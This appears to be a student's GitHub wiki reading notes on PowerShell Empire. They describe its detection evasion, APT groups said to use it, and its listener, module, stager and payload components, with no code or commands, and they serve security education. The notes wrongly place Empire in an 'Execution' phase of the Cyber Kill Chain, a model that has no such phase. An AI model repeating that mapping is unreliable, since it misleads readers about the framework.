401d8 read27 - carlosjorr/reading-notes GitHub Wiki

Persistence

What is one of the major advantages of PowerShell Empire?

One of the major advantages of PowerShell Empire is its ability to execute various post-exploitation tasks and lateral movement techniques while flying under the radar of traditional security mechanisms. It leverages PowerShell, a legitimate and widely used scripting language on Windows systems, which makes it less likely to be detected by antivirus or intrusion detection systems.

What are some of the APT groups that have been known to use PS Empire and into which step of the Cyber Kill Chain does the use of PS Empire fall?

Several Advanced Persistent Threat (APT) groups have been known to use PowerShell Empire in their operations. Some of these groups include:

APT29 (Cozy Bear): A Russian state-sponsored group. APT32 (OceanLotus): A Vietnamese state-sponsored group. APT33 (Elfin): A group associated with Iran. APT34 (OilRig): Another Iranian-associated group.

The use of PowerShell Empire typically falls under the "Execution" phase of the Cyber Kill Chain. This is the phase where the attacker gains a foothold in the target system and executes malicious code or commands to establish a persistent presence.

What are the four main components needed to pull off an attack using PS Empire?

To pull off an attack using PowerShell Empire, four main components are needed:

Listener: This is the component that waits for the compromised system to initiate communication with the attacker's infrastructure. It acts as a bridge for sending and receiving commands between the attacker and the compromised system.

Module: A module is a piece of PowerShell code that performs a specific task, such as gathering system information, spreading laterally, or exfiltrating data. PowerShell Empire provides a variety of modules to perform different actions on the compromised system.

Stager: The stager is a small piece of code that is initially executed on the victim system. It serves as the starting point for establishing communication with the attacker's infrastructure. The stager is responsible for downloading and executing the main payload.

Payload: The payload is the actual code or script that carries out the desired malicious actions on the compromised system. It can involve activities like lateral movement, data theft, or running arbitrary commands.